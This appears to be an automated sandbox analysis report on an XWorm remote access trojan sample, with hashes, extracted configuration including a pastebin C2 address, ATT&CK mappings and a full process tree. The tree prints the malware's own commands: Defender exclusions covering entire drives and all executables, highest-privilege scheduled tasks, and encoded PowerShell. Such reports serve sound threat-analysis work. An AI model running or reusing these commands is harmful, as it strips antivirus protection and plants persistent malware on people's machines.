xworm | 5d4826b4e67d3bee8c249587f56d570aa6a9df164023e07411efb1999beaf215

Analysis

max time kernel
58s
max time network
57s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
02/03/2025, 22:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Minerr.exe
Size

2.1MB
MD5

f46c6f4f73a0dee1aa7fd0e052048c16
SHA1

881b1a082c8e13d28090b315eff308353bf9a0da
SHA256

5d4826b4e67d3bee8c249587f56d570aa6a9df164023e07411efb1999beaf215
SHA512

f71fdb51a599ac01e7556189ff3ea9869a772bcfeebf619522f9aa60a1c09e5590ca754e29d6098f2f16be973d70836b7391391c3a6c803fc8215e9f41020f14
SSDEEP

24576:ILXNKU/m5FLQK63RD+u0nK9evQ2NVnF22p4V+Q6GixsAewetJMvgc6aJEdx4EKRZ:SXNKwcFLKg3Q2rcHYBhBe/M56TdF38

Score

10^/10

xworm defense_evasion execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

ppT2dXRAYHN1Fnfl

Attributes

Install_directory
%AppData%
install_file
svchost.exe
pastebin_url
https://pastebin.com/raw/6EU9ps8S

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral3/files/0x001d00000002ae42-7.dat	family_xworm
behavioral3/memory/1732-15-0x0000000000530000-0x0000000000558000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1440	powershell.exe
2128	powershell.exe
1084	powershell.exe
3108	powershell.exe
4852	powershell.exe
684	powershell.exe
4876	powershell.exe
3016	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	Miner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	Miner.exe

Executes dropped EXE 5 IoCs

pid	Process
1732	Miner.exe
3068	PepperX.exe
4184	services32.exe
3932	svchost.exe
2620	sihost32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	Miner.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	pastebin.com
1	pastebin.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\services32.exe	conhost.exe
File opened for modification	C:\Windows\system32\services32.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.exe	conhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1456	schtasks.exe
908	schtasks.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
4428	powershell.exe
4428	powershell.exe
4780	powershell.exe
4780	powershell.exe
1440	powershell.exe
1440	powershell.exe
2128	powershell.exe
2128	powershell.exe
1084	powershell.exe
1084	powershell.exe
3108	powershell.exe
3108	powershell.exe
1732	Miner.exe
2712	conhost.exe
4852	powershell.exe
4852	powershell.exe
684	powershell.exe
684	powershell.exe
1416	conhost.exe
1416	conhost.exe
4876	powershell.exe
4876	powershell.exe
3016	powershell.exe
3016	powershell.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeDebugPrivilege	1732	Miner.exe
Token: SeDebugPrivilege	4780	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	1084	powershell.exe
Token: SeDebugPrivilege	3108	powershell.exe
Token: SeDebugPrivilege	1732	Miner.exe
Token: SeDebugPrivilege	2712	conhost.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeDebugPrivilege	684	powershell.exe
Token: SeDebugPrivilege	3932	svchost.exe
Token: SeDebugPrivilege	1416	conhost.exe
Token: SeDebugPrivilege	4876	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1732	Miner.exe

Suspicious use of WriteProcessMemory 49 IoCs

description	pid	Process	procid_target
PID 3932 wrote to memory of 4428	3932	Minerr.exe	78
PID 3932 wrote to memory of 4428	3932	Minerr.exe	78
PID 3932 wrote to memory of 4780	3932	Minerr.exe	80
PID 3932 wrote to memory of 4780	3932	Minerr.exe	80
PID 3932 wrote to memory of 1732	3932	Minerr.exe	82
PID 3932 wrote to memory of 1732	3932	Minerr.exe	82
PID 3932 wrote to memory of 3068	3932	Minerr.exe	83
PID 3932 wrote to memory of 3068	3932	Minerr.exe	83
PID 1732 wrote to memory of 1440	1732	Miner.exe	84
PID 1732 wrote to memory of 1440	1732	Miner.exe	84
PID 1732 wrote to memory of 2128	1732	Miner.exe	86
PID 1732 wrote to memory of 2128	1732	Miner.exe	86
PID 1732 wrote to memory of 1084	1732	Miner.exe	88
PID 1732 wrote to memory of 1084	1732	Miner.exe	88
PID 1732 wrote to memory of 3108	1732	Miner.exe	90
PID 1732 wrote to memory of 3108	1732	Miner.exe	90
PID 1732 wrote to memory of 1456	1732	Miner.exe	92
PID 1732 wrote to memory of 1456	1732	Miner.exe	92
PID 3068 wrote to memory of 2712	3068	PepperX.exe	95
PID 3068 wrote to memory of 2712	3068	PepperX.exe	95
PID 3068 wrote to memory of 2712	3068	PepperX.exe	95
PID 2712 wrote to memory of 3364	2712	conhost.exe	96
PID 2712 wrote to memory of 3364	2712	conhost.exe	96
PID 3364 wrote to memory of 4852	3364	cmd.exe	98
PID 3364 wrote to memory of 4852	3364	cmd.exe	98
PID 2712 wrote to memory of 4988	2712	conhost.exe	99
PID 2712 wrote to memory of 4988	2712	conhost.exe	99
PID 4988 wrote to memory of 908	4988	cmd.exe	101
PID 4988 wrote to memory of 908	4988	cmd.exe	101
PID 3364 wrote to memory of 684	3364	cmd.exe	102
PID 3364 wrote to memory of 684	3364	cmd.exe	102
PID 2712 wrote to memory of 3096	2712	conhost.exe	103
PID 2712 wrote to memory of 3096	2712	conhost.exe	103
PID 3096 wrote to memory of 4184	3096	cmd.exe	105
PID 3096 wrote to memory of 4184	3096	cmd.exe	105
PID 4184 wrote to memory of 1416	4184	services32.exe	107
PID 4184 wrote to memory of 1416	4184	services32.exe	107
PID 4184 wrote to memory of 1416	4184	services32.exe	107
PID 1416 wrote to memory of 2044	1416	conhost.exe	108
PID 1416 wrote to memory of 2044	1416	conhost.exe	108
PID 2044 wrote to memory of 4876	2044	cmd.exe	110
PID 2044 wrote to memory of 4876	2044	cmd.exe	110
PID 1416 wrote to memory of 2620	1416	conhost.exe	111
PID 1416 wrote to memory of 2620	1416	conhost.exe	111
PID 2044 wrote to memory of 3016	2044	cmd.exe	112
PID 2044 wrote to memory of 3016	2044	cmd.exe	112
PID 2620 wrote to memory of 3884	2620	sihost32.exe	113
PID 2620 wrote to memory of 3884	2620	sihost32.exe	113
PID 2620 wrote to memory of 3884	2620	sihost32.exe	113

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Minerr.exe
"C:\Users\Admin\AppData\Local\Temp\Minerr.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAcwBkACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHQAcAB3ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAQwByAGkAdABpAGMAYQBsACAAZQByAHIAbwByACAANAAyADEALgAgAEQAbwBuAHQAIAByAHUAbgAgAG8AbgAgAGEAIABWAE0AIQAnACwAJwAnACwAJwBPAEsAJwAsACcAVwBhAHIAbgBpAG4AZwAnACkAPAAjAHkAbgB1ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4428
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAYgBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAZwBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAdgB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAcQBoACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4780
- C:\Users\Admin\AppData\Local\Temp\Miner.exe
  "C:\Users\Admin\AppData\Local\Temp\Miner.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1732
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Miner.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Miner.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2128
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1084
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3108
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1456
- C:\Users\Admin\AppData\Local\Temp\PepperX.exe
  "C:\Users\Admin\AppData\Local\Temp\PepperX.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3068
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\PepperX.exe"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3364
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4852
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:684
  - - C:\Windows\System32\cmd.exe
      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4988
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:908
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c "C:\Windows\system32\services32.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3096
    - - C:\Windows\system32\services32.exe
        
        C:\Windows\system32\services32.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4184
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1416
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
        
        C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
        
        "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2620
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost32"
        8⤵
        
        PID:3884

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

Filesize
539B

MD5
2d0c598bdafdf3bca91ec28b81c4474b

SHA1
2e7c2a21ceb95b3a774461e15f1f0a9ede36a3d5

SHA256
74f5fd99f66fcffa14a0927a9767c956120e90e714abea702b51a919c60d3ab0

SHA512
53fc7d64040f563601f7b5e63b1c1bbc7a98a4b1591bb18456bd3edb774c47859b0b56325ffc93128cdac547419ab11cfa1685f301b20ecb283f7414d4aed8a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
20276212ded315b6645a134963631777

SHA1
9d0c4ed93f631368ed0a2f57b10b7627923733bc

SHA256
4d3e69a4c2260f4feee6d84185ab8d3b722ba5cd5851b80576dd59105def74e1

SHA512
123328e1cf99ab89a17bac212237510ce527922f69465be11f45fe7cf807823b4bd255319a215b5d7b8e680c07ce3434dada8fd003e24eaa49e4347e593da0df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6f0e62045515b66d0a0105abc22dbf19

SHA1
894d685122f3f3c9a3457df2f0b12b0e851b394c

SHA256
529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319

SHA512
f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
64497dba662bee5d7ae7a3c76a72ed88

SHA1
edc027042b9983f13d074ba9eed8b78e55e4152e

SHA256
ca69ebbd2c9c185f0647fb2122d7a26e7d23af06a1950fb25ac327d869687b47

SHA512
25da69ec86ba0df6c7da60f722cc2919c59c91f2bb03137e0e87771936e5271522d48eef98030a0da41f7a707d82221d35fb016f8bb9a294e87be114adbe3522

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e07eea85a8893f23fb814cf4b3ed974c

SHA1
8a8125b2890bbddbfc3531d0ee4393dbbf5936fe

SHA256
83387ce468d717a7b4ba238af2273da873b731a13cc35604f775a31fa0ac70ea

SHA512
9d4808d8a261005391388b85da79e4c5396bdded6e7e5ce3a3a23e7359d1aa1fb983b4324f97e0afec6e8ed9d898322ca258dd7cda654456dd7e84c9cbd509df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9fe02a19db183cbe69c8d87c0f89d375

SHA1
2b4a654c0737c5b57b5ce554f2287425f3598f7c

SHA256
cb09b3f417a451a348671d01b81b91bb6142270e7d16934bda6598102c3107d9

SHA512
b334642b57fe8fb476c99c939b2a7d81e8fd091157f534b973e6f88cf21e71dd06bb510901debb8ec33388b3bd8f0be19471db3a2b75dc58d1f357ac1a024070

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
781da0576417bf414dc558e5a315e2be

SHA1
215451c1e370be595f1c389f587efeaa93108b4c

SHA256
41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe

SHA512
24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cd0556317cc5e38a42bc59b531b3f163

SHA1
0599218f7454cb628769e0e0568eaf383dcedf5e

SHA256
d3fcd33589700e0bdc35a588e84ca12290092e34087401bc927366bcb5629fa1

SHA512
4bd29b18f8864083a7ae130134d264992e8729037042dc24fbf75c59a80493d9c259dcc024bab3e2e4403f21a5a00440573bc459be07033f94588ebd96317287

Download Submit
C:\Users\Admin\AppData\Local\Temp\Miner.exe

Filesize
137KB

MD5
d536d3ad24896580e9d2fbd6613dfee2

SHA1
129298f26c07c45dd22652f7cc612dac5e7c76e8

SHA256
a51a4e2a0ea3115c7d1d0605254a184ab2b9bbf6b8bf954acb01c26f79385f2b

SHA512
eeeee97c4e4987ee671c8f3b1c3efda6fed384fc87c88ee7827dc1e344dfb0432e3ce9cfa1d8d0ee3528181dcb753f563db0ff3a6207b0f742787a00cb2c53b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\PepperX.exe

Filesize
1.9MB

MD5
0bfe288856b7c640428e136ff70c6480

SHA1
2ea28876403d8232efc41ac5276bb2307e34b24f

SHA256
8534832d9e128ca9df5d2939eefaba75e7d1487801c5422eff709b3c7a6e2445

SHA512
4f72974b3028d03f38367f069f5cb49c915ca67a97f17f9a97f436ba7a296bd529cb5b3d008b87b31f1d3d7bf5d1ef40de30a8b365d30fe57b738894fd82a748

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iyh2qrpm.5i0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\Microsoft\Telemetry\sihost32.exe

Filesize
32KB

MD5
7e4781ea884c5b020b14aa82bf3f52e2

SHA1
add4a585dc9879d141819601700406bab5406652

SHA256
5d4ab21c6a5b0b32c1e15584b1c12b5d6a8842ed52d7cf652812cc21ae95bbe5

SHA512
1757fc909372bc2eba1ce74364e7531c01cb388fc6f0d0a62dc3d1a6fb3bb1bb86ad28f47a8f9a0c5ce336eb488ea104f3e6a2efecbd65afb079017812bbcce5

Download Submit
memory/1732-15-0x0000000000530000-0x0000000000558000-memory.dmp

Filesize
160KB

Download
memory/1732-45-0x00007FFE0CE60000-0x00007FFE0D922000-memory.dmp

Filesize
10.8MB

Download
memory/1732-96-0x00007FFE0CE60000-0x00007FFE0D922000-memory.dmp

Filesize
10.8MB

Download
memory/2712-97-0x000001AF9A820000-0x000001AF9AA11000-memory.dmp

Filesize
1.9MB

Download
memory/2712-98-0x000001AFB54B0000-0x000001AFB56A2000-memory.dmp

Filesize
1.9MB

Download
memory/2712-99-0x000001AF9C7A0000-0x000001AF9C7B2000-memory.dmp

Filesize
72KB

Download
memory/3884-161-0x000002165F480000-0x000002165F486000-memory.dmp

Filesize
24KB

Download
memory/3884-160-0x000002165D910000-0x000002165D917000-memory.dmp

Filesize
28KB

Download
memory/3932-3-0x00007FFE0CE60000-0x00007FFE0D922000-memory.dmp

Filesize
10.8MB

Download
memory/3932-0-0x00000000003A0000-0x00000000005BE000-memory.dmp

Filesize
2.1MB

Download
memory/3932-1-0x00007FFE0CE63000-0x00007FFE0CE65000-memory.dmp

Filesize
8KB

Download
memory/3932-36-0x00007FFE0CE60000-0x00007FFE0D922000-memory.dmp

Filesize
10.8MB

Download
memory/4428-34-0x00007FFE0CE60000-0x00007FFE0D922000-memory.dmp

Filesize
10.8MB

Download
memory/4428-33-0x000001A79D600000-0x000001A79D622000-memory.dmp

Filesize
136KB

Download
memory/4428-26-0x00007FFE0CE60000-0x00007FFE0D922000-memory.dmp

Filesize
10.8MB

Download
memory/4428-35-0x00007FFE0CE60000-0x00007FFE0D922000-memory.dmp

Filesize
10.8MB

Download
memory/4428-95-0x00007FFE0CE60000-0x00007FFE0D922000-memory.dmp

Filesize
10.8MB

Download